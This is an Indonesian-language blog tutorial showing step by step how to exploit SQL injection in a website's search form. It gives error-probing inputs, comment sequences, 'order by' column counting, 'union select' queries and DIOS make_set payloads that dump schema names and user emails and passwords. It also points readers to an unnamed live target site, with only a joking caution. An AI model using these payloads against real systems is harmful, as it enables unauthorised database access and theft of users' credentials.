Sqli Injection Di Form Search / Pencarian

Sqli Injection Di Form Search / Pencarian

Yoo wassap! Dah lama ga update nih wkwkkw sorry ya, oke disini gw bakal share tutorial Cara Sqli Injection Di Form Search Atau Pencarian

Oke pertama siapkan target, disini gw udah ada target ya bisa kalian buat belajar, jangan di hack bro:'(

Silahkan buka, link nya ingat! Buat pembelajaran ya wkkw saya juga baru belajar nih hehe, langsung saja kalian ketik ke pencarian

1. Mencari Vulnerability
Contoh saya mencari test results dari pencarian "test" tidak memunculkan pesan eror bisa kalian coba dengan live target di atas
Sekarang kita coba dengan text test--+ dan results dari pencarian nya pun sama tidak memunculkan pesan eror sqli bisa kalian cari eror dengan menambahkan ( ' ) , ( " ) dll

Kita coba gunakan Comment/Balancing Yang sering di gunakan seperti di bawah
1. -- 
2. --+  
3. #  
4. --+-  
5. ;%00  

kita coba ke form pencarian dengan mengetikkan test" dan hasilnya pun eror "You have an error in your SQL syntax blablabla"
pesan ini muncul saat kita melakukan pencarian dengan menambahkan ( " ) tapi tidak semua web sama bisa kalian tambah string ( ' ) ( " ) dll

2. Menentukan Jumlah Columns
Setelah selesai pada tahap pertama kita lanjut ke tahap 2 Yaitu menentukan Jumlah Columns yang ada di DB web ini, dengan melakukan order by Mulai dari 1 sampe menemukan angka eror

portal/search.php?s=test'' order by 1--+ Normal
portal/search.php?s=test'' order by 2--+ Normal
portal/search.php?s=test'' order by 11--+ EROR
berarti jumlah Columns di web target ada 10

3. Mencari Angka Ajaib - Union Select
Kita menggunakan union select dengan Balancing yang di gunakan 
Di target saya menggunakan Balancing # 
Jadi kita masukan di pencarian dengan mencari 

test" union select 1,2,3,4,5,6,7,8,9,10#
Sesuaikan dengan jumlah Columns yang kalian dapat, lalu cari dan!1!1! Boom angka ajaib di web target muncul
di live target muncul angka ajaib Yaitu: 2,8 dan 4

4. Kita Coba Melakukan Dump 
Bagaimana caranya? Kita hanya perlu mengganti angka ajaib yang muncul dengan Dios, angka ajaib nya apa? Yang tadi muncul yaitu 2,8 dan 4 
Saya coba melakukan cek version, user, dan database
Dios: group_concat(version(),0x3a,user())
Masukan Dios di angka ajaib saya ambil nomor 2 dan muncul version, user dan DB web target
atau bisa menggunakan Dios ini
make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)

Untunk dump user & password
make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3c6c693e,email,password,password)),@)

Bisa kalian sesuai kan dengan untuk dump user dan password nya.

Oke mungkin sampe sini saja ya gw cape nulisnya, bila ada yang kurang jelas, maapin hehe saya juga masih belajar, thank you dah mampir jangan lupa share

You may like these posts